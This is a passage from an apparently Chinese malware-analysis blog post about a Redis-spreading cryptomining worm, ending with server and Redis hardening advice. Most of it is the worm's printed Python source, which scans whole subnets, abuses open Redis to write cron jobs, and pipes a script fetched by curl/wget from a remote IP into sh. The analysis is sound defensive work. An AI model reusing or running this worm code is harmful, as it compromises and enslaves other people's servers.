headers=headers) conn.request(method='MOVE', url='/fileserver/goa.txt', headers=headers2) conn.request(method='MOVE', url='/fileserver/gob.txt', headers=headers3) conn.close() s.close() except Exception: pass try: s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s2.settimeout(2) x = s2.connect_ex((self.host, 6379)) if x == 0: s2.send('config set stop-writes-on-bgsave-error no\r\n') s2.send('flushall\r\n') s2.send('config set dbfilename root\r\n') s2.send('set SwE3SC "\\t\\n*/10 * * * * root (curl -fsSL http://185.10.68.91/raw/68VYMp5T||wget -q -O- http://185.10.68.91/raw/68VYMp5T)|sh\\n\\t"\r\n') s2.send('set NysX7D "\\t\\n*/15 * * * * (curl -fsSL http://185.10.68.91/raw/68VYMp5T||wget -q -O- http://185.10.68.91/raw/68VYMp5T)|sh\\n\\t"\r\n') s2.send('config set dir /etc/cron.d\r\n') s2.send('save\r\n') s2.send('config set dir /var/spool/cron\r\n') s2.send('save\r\n') s2.send('config set dir /var/spool/cron/crontabs\r\n') s2.send('save\r\n') s2.send('flushall\r\n') s2.send('config set stop-writes-on-bgsave-error yes\r\n') s2.close() except Exception: pass scanner.lck.acquire() scanner.tlist.remove(self) if len(scanner.tlist) < scanner.maxthreads: scanner.evnt.set() scanner.evnt.clear() scanner.lck.release() def newthread(host): scanner.lck.acquire() sc = scanner(host) scanner.tlist.append(sc) scanner.lck.release() sc.start() newthread = staticmethod(newthread) def get_ip_list(): try: url = 'ident.me' conn = httplib.HTTPConnection(url, port=80, timeout=10) conn.request(method='GET', url='/', ) result = conn.getresponse() ip1 = result.read() ips1 = findall(r'\d+.\d+.', ip1)[0] for u in range(0, 256): ip_list1 = (ips1 + (str(u))) for g in range(1, 256): IP_LIST.append(ip_list1 + '.' + (str(g))) except Exception: ip2 = os.popen("/sbin/ifconfig -a|grep inet|grep -v 127.0.0.1|grep -v inet6|awk '{print $2}'|tr -d \"addr:\"").readline().rstrip() ips2 = findall(r'\d+.\d+.', ip2)[0] for i in range(0, 255): ip_list2 = (ips2 + (str(i))) for g in range(1, 255): IP_LIST.append(ip_list2 + '.' + (str(g))) pass def runPortscan(): get_ip_list() for host in IP_LIST: scanner.lck.acquire() if len(scanner.tlist) >= scanner.maxthreads: scanner.lck.release() scanner.evnt.wait() else: scanner.lck.release() scanner.newthread(host) for t in scanner.tlist: t.join() if __name__ == "__main__": runPortscan() ``` ## 0x03 总结 一开始的修改系统环境没什么好说的,接下来的写文件操作有点眼熟,如果用过redis的人,应该能猜到,这里是对redis进行配置。写这个配置,自然也就是利用了redis把缓存内容写入本地文件的漏洞,结果就是用本地的私钥去登陆被写入公钥的服务器了,无需密码就可以登陆,也就是我们文章最开始的/root/.ssh/authorized_keys。登录之后就开始定期执行计划任务,下载脚本。好了,配置文件准备好了,就开始利用masscan进行全网扫描redis服务器,寻找肉鸡,注意看这6379就是redis服务器的默认端口,如果你的redis的监听端口是公网IP或是0.0.0.0,并且没有密码保护,不好意思,你就中招了。 通过依次分析这3个脚本,就能看出这个病毒的可怕之处,先是通过写入ssh public key 拿到登录权限,然后下载执行远程二进制文件,最后再通过redis漏洞复制,迅速在全网传播,以指数级速度增长。那么问题是,这台服务器是怎么中招的呢?看了下redis.conf,bind的地址是127.0.0.1,没啥问题。由此可以推断,应该是root帐号被暴力破解了,为了验证我的想法,我lastb看了一下,果然有大量的记录: 图4 还剩最后一个问题,这个gpg-agentd程序到底是干什么的呢?我当时的第一个反应就是矿机,因为现在数字货币太火了,加大了分布式矿机的需求,也就催生了这条灰色产业链。于是,顺手把这个gpg-agentd拖到ida中,用string搜索bitcoin, eth, mine等相关单词,最终发现了这个: ## 0x04 安全建议 一,服务器 > 1,禁用ROOT > 2,用户名和密码尽量复杂 > 3,修改ssh的默认22端口 > 4,安装DenyHosts防暴力破解软件 > 5,禁用密码登录,使用RSA公钥登录 二,redis >1,禁用公网IP监听,包括0.0.0.0 >2,使用密码限制访问redis >3,使用较低权限帐号运行redis